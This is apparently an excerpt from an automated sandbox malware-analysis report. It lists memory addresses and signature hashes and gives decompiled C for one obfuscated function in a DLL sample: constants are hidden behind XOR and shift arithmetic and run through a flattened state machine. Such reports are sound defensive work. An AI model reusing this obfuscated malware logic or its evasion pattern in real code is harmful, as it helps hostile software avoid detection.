                                                                                                          0x02ae62cf
                                                                                                          0x02ae62d4
                                                                                                          0x02ae62db
                                                                                                          0x02ae62e6
                                                                                                          0x02ae62f1
                                                                                                          0x02ae62fc
                                                                                                          0x02ae6307
                                                                                                          0x02ae6312
                                                                                                          0x02ae6312
                                                                                                          0x02ae6317
                                                                                                          0x02ae631c
                                                                                                          0x02ae631c
                                                                                                          0x02ae631c
                                                                                                          0x02ae631c
                                                                                                          0x02ae6322
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae6578
                                                                                                          0x02ae657e
                                                                                                          0x02ae66b2
                                                                                                          0x02ae66b7
                                                                                                          0x00000000
                                                                                                          0x02ae6584
                                                                                                          0x02ae6584
                                                                                                          0x02ae658a
                                                                                                          0x02ae665a
                                                                                                          0x02ae665b
                                                                                                          0x02ae6663
                                                                                                          0x02ae6668
                                                                                                          0x02ae666f
                                                                                                          0x02ae6672
                                                                                                          0x02ae6674
                                                                                                          0x02ae667d
                                                                                                          0x02ae6682
                                                                                                          0x02ae6685
                                                                                                          0x00000000
                                                                                                          0x02ae6590
                                                                                                          0x02ae6590
                                                                                                          0x02ae6596
                                                                                                          0x02ae6637
                                                                                                          0x00000000
                                                                                                          0x02ae659c
                                                                                                          0x02ae659c
                                                                                                          0x02ae65a2
                                                                                                          0x02ae65a8
                                                                                                          0x02ae65b1
                                                                                                          0x02ae65b5
                                                                                                          0x02ae65fb
                                                                                                          0x02ae6600
                                                                                                          0x02ae660b
                                                                                                          0x02ae6616
                                                                                                          0x02ae662d
                                                                                                          0x02ae656e
                                                                                                          0x02ae656e
                                                                                                          0x02ae66bc
                                                                                                          0x02ae66bc
                                                                                                          0x02ae66c3
                                                                                                          0x02ae66cb
                                                                                                          0x02ae66cb
                                                                                                          0x00000000
                                                                                                          0x02ae65a2
                                                                                                          0x02ae6596
                                                                                                          0x02ae658a
                                                                                                          0x02ae6700
                                                                                                          0x02ae670a
                                                                                                          0x02ae670a
                                                                                                          0x02ae6328
                                                                                                          0x02ae648f
                                                                                                          0x02ae6498
                                                                                                          0x02ae649f
                                                                                                          0x02ae64ad
                                                                                                          0x02ae64bc
                                                                                                          0x02ae64c3
                                                                                                          0x02ae64ca
                                                                                                          0x02ae651c
                                                                                                          0x02ae6524
                                                                                                          0x02ae6541
                                                                                                          0x02ae6546
                                                                                                          0x02ae6564
                                                                                                          0x02ae6569
                                                                                                          0x00000000
                                                                                                          0x02ae632e
                                                                                                          0x02ae6330
                                                                                                          0x02ae6469
                                                                                                          0x02ae6470
                                                                                                          0x02ae647c
                                                                                                          0x02ae647e
                                                                                                          0x02ae6482
                                                                                                          0x02ae6487
                                                                                                          0x00000000
                                                                                                          0x02ae6336
                                                                                                          0x02ae6338
                                                                                                          0x02ae66f7
                                                                                                          0x02ae633e
                                                                                                          0x02ae6340
                                                                                                          0x02ae63fd
                                                                                                          0x02ae640e
                                                                                                          0x02ae6411
                                                                                                          0x02ae6416
                                                                                                          0x02ae6418
                                                                                                          0x00000000
                                                                                                          0x02ae6346
                                                                                                          0x02ae634c
                                                                                                          0x02ae63c5
                                                                                                          0x02ae63cc
                                                                                                          0x00000000
                                                                                                          0x02ae634e
                                                                                                          0x02ae6350
                                                                                                          0x00000000
                                                                                                          0x02ae6356
                                                                                                          0x02ae6388
                                                                                                          0x02ae638f
                                                                                                          0x02ae63a0
                                                                                                          0x02ae63a3
                                                                                                          0x02ae63a3
                                                                                                          0x00000000
                                                                                                          0x02ae63a3
                                                                                                          0x02ae6350
                                                                                                          0x02ae634c
                                                                                                          0x02ae6340
                                                                                                          0x02ae6338
                                                                                                          0x02ae6330
                                                                                                          0x00000000
                                                                                                          0x02ae66d0
                                                                                                          0x02ae66d0
                                                                                                          0x02ae66d0
                                                                                                          0x00000000
                                                                                                          0x02ae66dc
                                                                                                          0x02ae6317

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (INK$2G$5 $Jm$NI5$P_W$W"j$`$tJP${4$W
                                                                                                          • API String ID: 0-4122124823
                                                                                                          • Opcode ID: 134e91bfdd587db62cce4ae5c81511cd44dbe93cc96248c363b94aa7036b3309
                                                                                                          • Instruction ID: ae4333c77fa5d8c439484a5ff47867fa7faf6d82a4d0ad1dd509fe7800a446f9
                                                                                                          • Opcode Fuzzy Hash: 134e91bfdd587db62cce4ae5c81511cd44dbe93cc96248c363b94aa7036b3309
                                                                                                          • Instruction Fuzzy Hash: 5B72FE715083818FD7B9CF65C58AB8FBBE2BBC4704F10891DE2DA86260DBB18559CF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AED14C, Relevance: 14.1, Strings: 11, Instructions: 385COMMONCrypto
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 786 2aed14c-2aed7fc 787 2aed807 786->787 788 2aed80c-2aed80e 787->788 789 2aed80f-2aed811 788->789 790 2aed92e-2aed934 789->790 791 2aed817 789->791 794 2aeda2d-2aeda6a call 2ae1a34 790->794 795 2aed93a-2aed940 790->795 792 2aed81d-2aed823 791->792 793 2aeda79-2aeda95 call 2ae3046 791->793 796 2aed89d-2aed913 call 2af7c4e 792->796 797 2aed825-2aed82b 792->797 816 2aeda98-2aedaa9 793->816 807 2aeda6b-2aeda71 794->807 799 2aed9fe-2aeda21 call 2afe8b6 795->799 800 2aed946-2aed94c 795->800 820 2aed85d-2aed85f 796->820 821 2aed919-2aed929 796->821 804 2aed82d-2aed833 797->804 805 2aed87a-2aed886 797->805 799->816 822 2aeda23-2aeda28 799->822 800->807 808 2aed952-2aed9f9 call 2afe1f8 call 2ae7078 call 2aef96f call 2affecb 800->808 812 2aed835-2aed83b 804->812 813 2aed861-2aed878 call 2afb257 804->813 817 2aed88b-2aed88e 805->817 807->789 814 2aeda77 807->814 808->787 812->807 823 2aed841-2aed85a call 2ae3046 812->823 813->788 814->816 818 2aed888 817->818 819 2aed890-2aed898 817->819 818->817 819->789 820->788 821->788 822->788 823->820
                                                                                                          C-Code - Quality: 98%
                                                                                                          			E02AED14C() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				void* _t429;
				intOrPtr _t432;
				intOrPtr _t436;
				signed int _t440;
				void* _t441;
				void* _t459;
				signed int _t468;
				intOrPtr _t469;
				intOrPtr* _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int* _t477;
				void* _t480;

				_t477 =  &_v1756;
				_v1600 = 0x9247ff;
				_t441 = 0xcb67425;
				_v1600 = _v1600 + 0x9ce;
				_v1600 = _v1600 ^ 0x009251e4;
				_v1720 = 0x31cc78;
				_v1720 = _v1720 ^ 0xe44f8b4e;
				_v1720 = _v1720 | 0xfbe7febf;
				_v1720 = _v1720 ^ 0xfff0ff80;
				_v1612 = 0x6730db;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0xcc36c002;
				_v1668 = 0x7fe6a4;
				_v1668 = _v1668 + 0xffff1494;
				_v1668 = _v1668 ^ 0x091c946b;
				_v1668 = _v1668 ^ 0x09626f51;
				_v1756 = 0x73e886;
				_v1756 = _v1756 | 0xafbdbbdf;
				_v1756 = _v1756 + 0xfe30;
				_v1756 = _v1756 ^ 0xb000fa0f;
				_v1604 = 0x468da6;
				_v1604 = _v1604 + 0xffffc3ca;
				_v1604 = _v1604 ^ 0x00465160;
				_v1592 = 0xd4519;
				_v1592 = _v1592 + 0x934d;
				_v1592 = _v1592 ^ 0x0004ddfc;
				_v1640 = 0x8a1a75;
				_v1640 = _v1640 + 0x87da;
				_v1640 = _v1640 + 0xaa53;
				_v1640 = _v1640 ^ 0x008e8924;
				_v1648 = 0xe80c10;
				_v1648 = _v1648 ^ 0x90af551f;
				_v1648 = _v1648 + 0x6d6d;
				_v1648 = _v1648 ^ 0x90403b69;
				_v1712 = 0x809df1;
				_v1712 = _v1712 << 2;
				_v1712 = _v1712 << 7;
				_v1576 = _v1576 & 0x00000000;
				_v1712 = _v1712 * 0x69;
				_v1712 = _v1712 ^ 0x81832f4f;
				_v1656 = 0xe952a2;
				_v1656 = _v1656 | 0x54fcc54b;
				_v1656 = _v1656 + 0xffff1739;
				_v1656 = _v1656 ^ 0x54fad21b;
				_v1700 = 0xbcdb1b;
				_v1700 = _v1700 + 0xdccd;
				_v1700 = _v1700 + 0xffffcf6f;
				_v1700 = _v1700 ^ 0x00b72c28;
				_v1628 = 0x5c7dad;
				_v1628 = _v1628 >> 5;
				_v1628 = _v1628 + 0x3d87;
				_v1628 = _v1628 ^ 0x000cf9b2;
				_v1660 = 0x2281c9;
				_v1660 = _v1660 * 0x49;
				_v1660 = _v1660 >> 5;
				_v1660 = _v1660 ^ 0x004fb411;
				_v1568 = 0xcd133d;
				_v1568 = _v1568 * 0x4e;
				_v1568 = _v1568 ^ 0x3e7dd872;
				_v1672 = 0x86c6ca;
				_v1672 = _v1672 * 0x5f;
				_v1672 = _v1672 + 0xffff3952;
				_v1672 = _v1672 ^ 0x3200c70e;
				_v1588 = 0x24e2cc;
				_v1588 = _v1588 | 0xcf150453;
				_v1588 = _v1588 ^ 0xcf3ce5d0;
				_v1572 = 0x6249a8;
				_v1572 = _v1572 << 6;
				_v1572 = _v1572 ^ 0x189f8b0c;
				_v1596 = 0x119a44;
				_v1596 = _v1596 >> 8;
				_v1596 = _v1596 ^ 0x000b5fad;
				_v1680 = 0xd16cc2;
				_v1680 = _v1680 ^ 0x4916a611;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 ^ 0x00055714;
				_v1728 = 0x441d3d;
				_t471 = 0x35;
				_v1728 = _v1728 * 3;
				_v1728 = _v1728 << 3;
				_v1728 = _v1728 | 0x559f2c94;
				_v1728 = _v1728 ^ 0x57fdad3a;
				_v1564 = 0xb1e813;
				_v1564 = _v1564 >> 0xc;
				_v1564 = _v1564 ^ 0x0004104c;
				_v1736 = 0x70197f;
				_v1736 = _v1736 >> 0x10;
				_v1736 = _v1736 + 0xe51d;
				_v1736 = _v1736 * 0x61;
				_v1736 = _v1736 ^ 0x00557f63;
				_v1744 = 0x5ff0e3;
				_v1744 = _v1744 + 0xffff2d97;
				_v1744 = _v1744 + 0xffff9c65;
				_v1744 = _v1744 ^ 0xd07f01de;
				_v1744 = _v1744 ^ 0xd026cc62;
				_v1608 = 0x914f5e;
				_v1608 = _v1608 << 0xf;
				_v1608 = _v1608 ^ 0xa7adba7a;
				_v1664 = 0xe3376f;
				_v1664 = _v1664 >> 8;
				_v1664 = _v1664 << 4;
				_v1664 = _v1664 ^ 0x000bcae6;
				_v1616 = 0x54b2fb;
				_v1616 = _v1616 + 0xce1d;
				_v1616 = _v1616 ^ 0x005b3b7b;
				_v1644 = 0xe2ce3f;
				_v1644 = _v1644 + 0x16f2;
				_v1644 = _v1644 >> 0xd;
				_v1644 = _v1644 ^ 0x000e1e70;
				_v1752 = 0x7f4aca;
				_v1752 = _v1752 ^ 0x883f1d9d;
				_v1752 = _v1752 + 0x59a5;
				_v1752 = _v1752 | 0x80ddc91b;
				_v1752 = _v1752 ^ 0x88d3833c;
				_v1636 = 0xc2c2cf;
				_v1636 = _v1636 / _t471;
				_v1636 = _v1636 + 0xffff5d17;
				_v1636 = _v1636 ^ 0x0005a2c5;
				_v1676 = 0x4604e2;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 + 0xdac5;
				_v1676 = _v1676 ^ 0x2048b942;
				_v1652 = 0x890d36;
				_v1652 = _v1652 >> 3;
				_v1652 = _v1652 | 0xfe9d52c1;
				_v1652 = _v1652 ^ 0xfe9ab4fb;
				_v1684 = 0xd96cde;
				_v1684 = _v1684 * 0x47;
				_v1684 = _v1684 + 0xffff480a;
				_v1684 = _v1684 ^ 0x3c48c040;
				_v1624 = 0xc48732;
				_v1624 = _v1624 >> 4;
				_v1624 = _v1624 ^ 0x01665cbd;
				_v1624 = _v1624 ^ 0x016df620;
				_v1692 = 0x58f5b8;
				_v1692 = _v1692 << 4;
				_v1692 = _v1692 ^ 0x299232ca;
				_v1692 = _v1692 ^ 0x2c1b7361;
				_v1732 = 0x9987b4;
				_v1732 = _v1732 << 4;
				_v1732 = _v1732 ^ 0x14505727;
				_v1732 = _v1732 | 0xbadb6758;
				_v1732 = _v1732 ^ 0xbfd57076;
				_v1708 = 0x151e5;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 >> 0xe;
				_v1708 = _v1708 + 0xffff12c7;
				_v1708 = _v1708 ^ 0xffff0a0d;
				_v1580 = 0x15a9fb;
				_v1580 = _v1580 >> 6;
				_v1580 = _v1580 ^ 0x0004a695;
				_v1688 = 0x871746;
				_t472 = 0x34;
				_v1688 = _v1688 / _t472;
				_v1688 = _v1688 + 0xffff07ae;
				_v1688 = _v1688 ^ 0x00087c5e;
				_v1740 = 0xe3d16b;
				_v1740 = _v1740 << 7;
				_v1740 = _v1740 | 0x6cb9ee1d;
				_v1740 = _v1740 ^ 0x38143ac0;
				_v1740 = _v1740 ^ 0x45e6e926;
				_v1724 = 0xe03c47;
				_v1724 = _v1724 + 0x7497;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 + 0xffff69be;
				_v1724 = _v1724 ^ 0x2c306d9d;
				_v1748 = 0xe2efab;
				_v1748 = _v1748 | 0x110de103;
				_v1748 = _v1748 + 0x3577;
				_t473 = 0x2b;
				_t440 = _v1576;
				_v1748 = _v1748 / _t473;
				_v1748 = _v1748 ^ 0x006272f3;
				_v1716 = 0x295420;
				_v1716 = _v1716 ^ 0xaa3d2c48;
				_v1716 = _v1716 + 0xffff3248;
				_v1716 = _v1716 ^ 0xb95b2034;
				_v1716 = _v1716 ^ 0x134f16e6;
				_v1620 = 0x315b6e;
				_v1620 = _v1620 ^ 0xed866512;
				_v1620 = _v1620 ^ 0xedb02c8f;
				_v1696 = 0xb25998;
				_t476 = _v1576;
				_t468 = _v1576;
				_v1696 = _v1696 * 0xf;
				_v1696 = _v1696 << 9;
				_v1696 = _v1696 ^ 0xe675be87;
				_v1632 = 0x9ab851;
				_v1632 = _v1632 ^ 0x37be7fac;
				_v1632 = _v1632 + 0xffff726f;
				_v1632 = _v1632 ^ 0x372cadd5;
				_v1704 = 0xe98d3;
				_v1704 = _v1704 | 0xb808fc66;
				_v1704 = _v1704 ^ 0xb98541de;
				_v1704 = _v1704 | 0x92c26071;
				_v1704 = _v1704 ^ 0x93ce4092;
				_v1584 = 0x695255;
				_v1584 = _v1584 | 0x2c3ea780;
				_v1584 = _v1584 ^ 0x2c75cea7;
				while(1) {
					L1:
					while(1) {
						_t459 = 0x5c;
						do {
							while(1) {
								L3:
								_t480 = _t441 - 0xc1f8872;
								if(_t480 > 0) {
									break;
								}
								if(_t480 == 0) {
									E02AE3046(_v1696, _v1632, _v1704, _t440, _v1584);
								} else {
									if(_t441 == 0x1770085) {
										_t476 = E02AF7C4E(_t440, _t459, _t441, _v1644, _v1752, _v1668, _v1636, _v1676, _v1756, _v1652, _t468, _v1684, _v1604, _v1624, _t441, _v1692, _t441, _v1732, _t441, _t468, _v1708,  &_v1560, _v1580, _v1612);
										_t477 =  &(_t477[0x16]);
										__eflags = _t476;
										if(_t476 == 0) {
											goto L10;
										} else {
											_t441 = 0x650cb13;
											_v1576 = 1;
											while(1) {
												_t459 = 0x5c;
												goto L3;
											}
										}
									} else {
										if(_t441 == 0x30ba806) {
											_t469 =  *0x2b06214; // 0x0
											_t470 = _t469 + 0x23c;
											while(1) {
												__eflags =  *_t470 - _t459;
												if( *_t470 == _t459) {
													break;
												}
												_t470 = _t470 + 2;
												__eflags = _t470;
											}
											_t468 = _t470 + 2;
											_t441 = 0xd1695f5;
											continue;
										} else {
											if(_t441 == 0x650cb13) {
												E02AFB257(_t440, _v1688, _v1740, _t476);
												_t441 = 0x8b9ab05;
												while(1) {
													_t459 = 0x5c;
													goto L3;
												}
											} else {
												if(_t441 != 0x8b9ab05) {
													goto L25;
												} else {
													_t352 =  &_v1748; // 0x45e6e926
													E02AE3046(_v1724,  *_t352, _v1716, _t476, _v1620);
													_t477 =  &(_t477[3]);
													L10:
													_t441 = 0xc1f8872;
													while(1) {
														_t459 = 0x5c;
														goto L3;
													}
												}
											}
										}
									}
								}
								L28:
								return _v1576;
							}
							__eflags = _t441 - 0xcb67425;
							if(_t441 == 0xcb67425) {
								E02AE1A34(_v1592,  &_v520, _t441, _t441, _v1640, _v1648, _v1712, _t441, _v1600, _v1656);
								_t477 =  &(_t477[8]);
								_t441 = 0xd521465;
								_t459 = 0x5c;
								goto L25;
							} else {
								__eflags = _t441 - 0xd1695f5;
								if(_t441 == 0xd1695f5) {
									_t440 = E02AFE8B6(_t441, _v1608, _v1664, _t441, _v1720, _v1616);
									_t477 =  &(_t477[4]);
									__eflags = _t440;
									if(_t440 != 0) {
										_t441 = 0x1770085;
										_t459 = 0x5c;
										goto L3;
									}
								} else {
									__eflags = _t441 - 0xd521465;
									if(__eflags != 0) {
										goto L25;
									} else {
										_push(_v1568);
										_push(_v1660);
										_push(_v1628);
										_t429 = E02AFE1F8(0x2ae1030, _v1700, __eflags);
										E02AE7078( &_v1040, __eflags);
										_t432 =  *0x2b06214; // 0x0
										_t436 =  *0x2b06214; // 0x0
										E02AEF96F(_v1672, __eflags, _t436 + 0x34, _t429,  &_v1040, _v1588,  &_v1560, _t432 + 0x23c, _v1572, _v1596, _v1680,  &_v520);
										E02AFFECB(_t429, _v1728, _v1564, _v1736, _v1744);
										_t477 =  &(_t477[0x10]);
										_t441 = 0x30ba806;
										goto L1;
									}
								}
							}
							goto L28;
							L25:
							__eflags = _t441 - 0x3fe9fd3;
						} while (_t441 != 0x3fe9fd3);
						goto L28;
					}
				}
			}






































































                                                                                                          0x02aed14c
                                                                                                          0x02aed156
                                                                                                          0x02aed161
                                                                                                          0x02aed166
                                                                                                          0x02aed171
                                                                                                          0x02aed17c
                                                                                                          0x02aed184
                                                                                                          0x02aed18c
                                                                                                          0x02aed194
                                                                                                          0x02aed19c
                                                                                                          0x02aed1a7
                                                                                                          0x02aed1af
                                                                                                          0x02aed1ba
                                                                                                          0x02aed1c2
                                                                                                          0x02aed1ca
                                                                                                          0x02aed1d2
                                                                                                          0x02aed1da
                                                                                                          0x02aed1e2
                                                                                                          0x02aed1ea
                                                                                                          0x02aed1f2
                                                                                                          0x02aed1fa
                                                                                                          0x02aed205
                                                                                                          0x02aed210
                                                                                                          0x02aed21b
                                                                                                          0x02aed226
                                                                                                          0x02aed231
                                                                                                          0x02aed23c
                                                                                                          0x02aed247
                                                                                                          0x02aed252
                                                                                                          0x02aed25d
                                                                                                          0x02aed268
                                                                                                          0x02aed270
                                                                                                          0x02aed278
                                                                                                          0x02aed280
                                                                                                          0x02aed288
                                                                                                          0x02aed290
                                                                                                          0x02aed295
                                                                                                          0x02aed29f
                                                                                                          0x02aed2a7
                                                                                                          0x02aed2ab
                                                                                                          0x02aed2b3
                                                                                                          0x02aed2bb
                                                                                                          0x02aed2c3
                                                                                                          0x02aed2cb
                                                                                                          0x02aed2d3
                                                                                                          0x02aed2db
                                                                                                          0x02aed2e3
                                                                                                          0x02aed2eb
                                                                                                          0x02aed2f3
                                                                                                          0x02aed2fe
                                                                                                          0x02aed306
                                                                                                          0x02aed311
                                                                                                          0x02aed31c
                                                                                                          0x02aed329
                                                                                                          0x02aed32d
                                                                                                          0x02aed332
                                                                                                          0x02aed33a
                                                                                                          0x02aed34d
                                                                                                          0x02aed354
                                                                                                          0x02aed35f
                                                                                                          0x02aed36c
                                                                                                          0x02aed370
                                                                                                          0x02aed378
                                                                                                          0x02aed380
                                                                                                          0x02aed38b
                                                                                                          0x02aed396
                                                                                                          0x02aed3a1
                                                                                                          0x02aed3ac
                                                                                                          0x02aed3b4
                                                                                                          0x02aed3bf
                                                                                                          0x02aed3ca
                                                                                                          0x02aed3d2
                                                                                                          0x02aed3dd
                                                                                                          0x02aed3e5
                                                                                                          0x02aed3ed
                                                                                                          0x02aed3f4
                                                                                                          0x02aed3fc
                                                                                                          0x02aed40b
                                                                                                          0x02aed40c
                                                                                                          0x02aed410
                                                                                                          0x02aed415
                                                                                                          0x02aed41d
                                                                                                          0x02aed425
                                                                                                          0x02aed430
                                                                                                          0x02aed438
                                                                                                          0x02aed443
                                                                                                          0x02aed44b
                                                                                                          0x02aed450
                                                                                                          0x02aed45d
                                                                                                          0x02aed461
                                                                                                          0x02aed469
                                                                                                          0x02aed471
                                                                                                          0x02aed479
                                                                                                          0x02aed481
                                                                                                          0x02aed489
                                                                                                          0x02aed491
                                                                                                          0x02aed49c
                                                                                                          0x02aed4a4
                                                                                                          0x02aed4af
                                                                                                          0x02aed4b7
                                                                                                          0x02aed4bc
                                                                                                          0x02aed4c1
                                                                                                          0x02aed4c9
                                                                                                          0x02aed4d4
                                                                                                          0x02aed4df
                                                                                                          0x02aed4ea
                                                                                                          0x02aed4f5
                                                                                                          0x02aed500
                                                                                                          0x02aed508
                                                                                                          0x02aed513
                                                                                                          0x02aed51b
                                                                                                          0x02aed523
                                                                                                          0x02aed52b
                                                                                                          0x02aed533
                                                                                                          0x02aed53b
                                                                                                          0x02aed54f
                                                                                                          0x02aed556
                                                                                                          0x02aed561
                                                                                                          0x02aed56c
                                                                                                          0x02aed579
                                                                                                          0x02aed57d
                                                                                                          0x02aed585
                                                                                                          0x02aed58d
                                                                                                          0x02aed595
                                                                                                          0x02aed59a
                                                                                                          0x02aed5a2
                                                                                                          0x02aed5aa
                                                                                                          0x02aed5b7
                                                                                                          0x02aed5bb
                                                                                                          0x02aed5c3
                                                                                                          0x02aed5cb
                                                                                                          0x02aed5d6
                                                                                                          0x02aed5de
                                                                                                          0x02aed5e9
                                                                                                          0x02aed5f4
                                                                                                          0x02aed5fc
                                                                                                          0x02aed601
                                                                                                          0x02aed609
                                                                                                          0x02aed611
                                                                                                          0x02aed619
                                                                                                          0x02aed61e
                                                                                                          0x02aed626
                                                                                                          0x02aed62e
                                                                                                          0x02aed636
                                                                                                          0x02aed63e
                                                                                                          0x02aed643
                                                                                                          0x02aed648
                                                                                                          0x02aed650
                                                                                                          0x02aed65a
                                                                                                          0x02aed665
                                                                                                          0x02aed66d
                                                                                                          0x02aed678
                                                                                                          0x02aed686
                                                                                                          0x02aed68b
                                                                                                          0x02aed691
                                                                                                          0x02aed699
                                                                                                          0x02aed6a1
                                                                                                          0x02aed6a9
                                                                                                          0x02aed6ae
                                                                                                          0x02aed6b6
                                                                                                          0x02aed6be
                                                                                                          0x02aed6c6
                                                                                                          0x02aed6ce
                                                                                                          0x02aed6d6
                                                                                                          0x02aed6db
                                                                                                          0x02aed6e3
                                                                                                          0x02aed6eb
                                                                                                          0x02aed6f3
                                                                                                          0x02aed6fb
                                                                                                          0x02aed707
                                                                                                          0x02aed70a
                                                                                                          0x02aed711
                                                                                                          0x02aed715
                                                                                                          0x02aed71d
                                                                                                          0x02aed725
                                                                                                          0x02aed72d
                                                                                                          0x02aed735
                                                                                                          0x02aed73d
                                                                                                          0x02aed745
                                                                                                          0x02aed750
                                                                                                          0x02aed75b
                                                                                                          0x02aed766
                                                                                                          0x02aed773
                                                                                                          0x02aed77a
                                                                                                          0x02aed781
                                                                                                          0x02aed785
                                                                                                          0x02aed78a
                                                                                                          0x02aed792
                                                                                                          0x02aed79d
                                                                                                          0x02aed7a8
                                                                                                          0x02aed7b3
                                                                                                          0x02aed7be
                                                                                                          0x02aed7c6
                                                                                                          0x02aed7ce
                                                                                                          0x02aed7d6
                                                                                                          0x02aed7de
                                                                                                          0x02aed7e6
                                                                                                          0x02aed7f1
                                                                                                          0x02aed7fc
                                                                                                          0x02aed807
                                                                                                          0x02aed807
                                                                                                          0x02aed80c
                                                                                                          0x02aed80e
                                                                                                          0x02aed80f
                                                                                                          0x02aed80f
                                                                                                          0x02aed80f
                                                                                                          0x02aed80f
                                                                                                          0x02aed811
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aed817
                                                                                                          0x02aeda90
                                                                                                          0x02aed81d
                                                                                                          0x02aed823
                                                                                                          0x02aed90c
                                                                                                          0x02aed90e
                                                                                                          0x02aed911
                                                                                                          0x02aed913
                                                                                                          0x00000000
                                                                                                          0x02aed919
                                                                                                          0x02aed919
                                                                                                          0x02aed91e
                                                                                                          0x02aed80c
                                                                                                          0x02aed80e
                                                                                                          0x00000000
                                                                                                          0x02aed80e
                                                                                                          0x02aed80c
                                                                                                          0x02aed825
                                                                                                          0x02aed82b
                                                                                                          0x02aed87a
                                                                                                          0x02aed880
                                                                                                          0x02aed88b
                                                                                                          0x02aed88b
                                                                                                          0x02aed88e
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aed888
                                                                                                          0x02aed888
                                                                                                          0x02aed888
                                                                                                          0x02aed890
                                                                                                          0x02aed893
                                                                                                          0x00000000
                                                                                                          0x02aed82d
                                                                                                          0x02aed833
                                                                                                          0x02aed86c
                                                                                                          0x02aed873
                                                                                                          0x02aed80c
                                                                                                          0x02aed80e
                                                                                                          0x00000000
                                                                                                          0x02aed80e
                                                                                                          0x02aed835
                                                                                                          0x02aed83b
                                                                                                          0x00000000
                                                                                                          0x02aed841
                                                                                                          0x02aed84d
                                                                                                          0x02aed855
                                                                                                          0x02aed85a
                                                                                                          0x02aed85d
                                                                                                          0x02aed85d
                                                                                                          0x02aed80c
                                                                                                          0x02aed80e
                                                                                                          0x00000000
                                                                                                          0x02aed80e
                                                                                                          0x02aed80c
                                                                                                          0x02aed83b
                                                                                                          0x02aed833
                                                                                                          0x02aed82b
                                                                                                          0x02aed823
                                                                                                          0x02aeda98
                                                                                                          0x02aedaa9
                                                                                                          0x02aedaa9
                                                                                                          0x02aed92e
                                                                                                          0x02aed934
                                                                                                          0x02aeda5b
                                                                                                          0x02aeda60
                                                                                                          0x02aeda63
                                                                                                          0x02aeda6a
                                                                                                          0x00000000
                                                                                                          0x02aed93a
                                                                                                          0x02aed93a
                                                                                                          0x02aed940
                                                                                                          0x02aeda1a
                                                                                                          0x02aeda1c
                                                                                                          0x02aeda1f
                                                                                                          0x02aeda21
                                                                                                          0x02aeda23
                                                                                                          0x02aed80e
                                                                                                          0x00000000
                                                                                                          0x02aed80e
                                                                                                          0x02aed946
                                                                                                          0x02aed946
                                                                                                          0x02aed94c
                                                                                                          0x00000000
                                                                                                          0x02aed952
                                                                                                          0x02aed952
                                                                                                          0x02aed95e
                                                                                                          0x02aed962
                                                                                                          0x02aed96d
                                                                                                          0x02aed97b
                                                                                                          0x02aed99f
                                                                                                          0x02aed9c8
                                                                                                          0x02aed9d2
                                                                                                          0x02aed9ec
                                                                                                          0x02aed9f1
                                                                                                          0x02aed9f4
                                                                                                          0x00000000
                                                                                                          0x02aed9f4
                                                                                                          0x02aed94c
                                                                                                          0x02aed940
                                                                                                          0x00000000
                                                                                                          0x02aeda6b
                                                                                                          0x02aeda6b
                                                                                                          0x02aeda6b
                                                                                                          0x00000000
                                                                                                          0x02aeda77
                                                                                                          0x02aed80c

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: T)$&E$G<$Qob$URi$`QF$mm$n[1$o7$w5${;[
                                                                                                          • API String ID: 0-1763375246
                                                                                                          • Opcode ID: 5b692182414c233f85c6acd36f31459df9927bf36a434f5d1e093ac7a9de1d9e
                                                                                                          • Instruction ID: 76c206f99d5d249ffb0552e4c1620a26a27e8f3617eb99ea5d8f47186576f8ad
                                                                                                          • Opcode Fuzzy Hash: 5b692182414c233f85c6acd36f31459df9927bf36a434f5d1e093ac7a9de1d9e
